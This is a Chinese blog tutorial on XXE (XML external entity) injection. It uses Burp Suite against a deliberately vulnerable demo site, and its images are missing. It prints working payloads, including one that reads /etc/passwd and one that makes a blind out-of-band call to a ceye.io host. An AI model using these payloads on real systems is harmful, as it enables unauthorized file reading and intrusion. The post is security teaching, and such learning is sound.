首页 > 其他 > 详细

xxe漏洞呀

时间:2018-06-18 00:13:49      阅读:861      评论:0      收藏:0      [点我收藏+]

xxe漏洞就是能直接在请求里可以引用一个实体,然后造成读文件,只需要懂这个基本攻击原理就行

技术分享图片

先了解什么是xxe

xml外部实体注入简称xxe,注入的什么呢  一段xml代码

技术分享图片

 

就是一个请求里 可以携带一个xml引用,然后可以读文件

 

https://security.tencent.com/index.php/blog/msg/69 腾讯也有一篇关于xxe的讲义

 

 

来操作一哈

打开burpsuite设置监听,浏览器也设置代理,端口8080

技术分享图片

技术分享图片

 

打开http://testhtml5.vulnweb.com/这个网址,登陆,账号密码都输admin,点忘记密码

技术分享图片

技术分享图片

 

如果打不开这个网,可能是开了拦截,要关掉

技术分享图片

 

然后再去proxy里找请求

技术分享图片

 

然后发送到  send to repeater

技术分享图片

 

点一下go

技术分享图片

 

然后你改下下面的请求

技术分享图片

 

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY myentity "xiaoyu"> ]> <forgot><username>&myentity;</username></forgot>

技术分享图片

 

读出xiaoyu了 证明存在xxe

 

 

不过不能这么读,读不了etc/passwd

技术分享图片

 

改了攻击的荷载它无法识别

技术分享图片

 

昨天我们不是说了 xxe的基本的几个攻击荷载吗,这个用不了,在这个漏洞里

技术分享图片

 

看这个例子https://www.secpulse.com/archives/41154.html

这个攻击荷载是这个

<!DOCTYPE z [<!ENTITY test  SYSTEM "file:///etc/passwd" >]>

 

这个是别人文章里的例子

http://www.freebuf.com/articles/web/126788.html

 

这个是owasp top web安全组织 对于xxe的全英文讲解

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

 

怎么找xxe漏洞呢?就得看这个ppt了

技术分享图片

技术分享图片

 

第一种 简单概括为 wsdl后缀得

http://wooyun.jozxing.cc/search?keywords=xxe&content_search_by=by_bugs

这里有更多得实例去做参考

 

这个漏洞我自己挖到的很少,因为有些没回显,还需要借助ceye.io

它在这个荷载里加入这个 可以判断是否存在xxe,我们可以拿刚才的testhtml5.vulweb.com做下实验

技术分享图片

 

有一条请求

技术分享图片

技术分享图片

 

这里它和awvs判断的依据是一样的,读取了这个服务器的ip

技术分享图片

 

 

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://ip.port.ly4ei1.ceye.io/xxe_test"> %remote;]> <root/>

技术分享图片

 

这里改成你的地址

技术分享图片

用burpsuite请求一下,然后去看日志

 

 

这是我的地址啦

技术分享图片

xxe漏洞呀

原文:https://www.cnblogs.com/Tiny-Fish/p/9194102.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!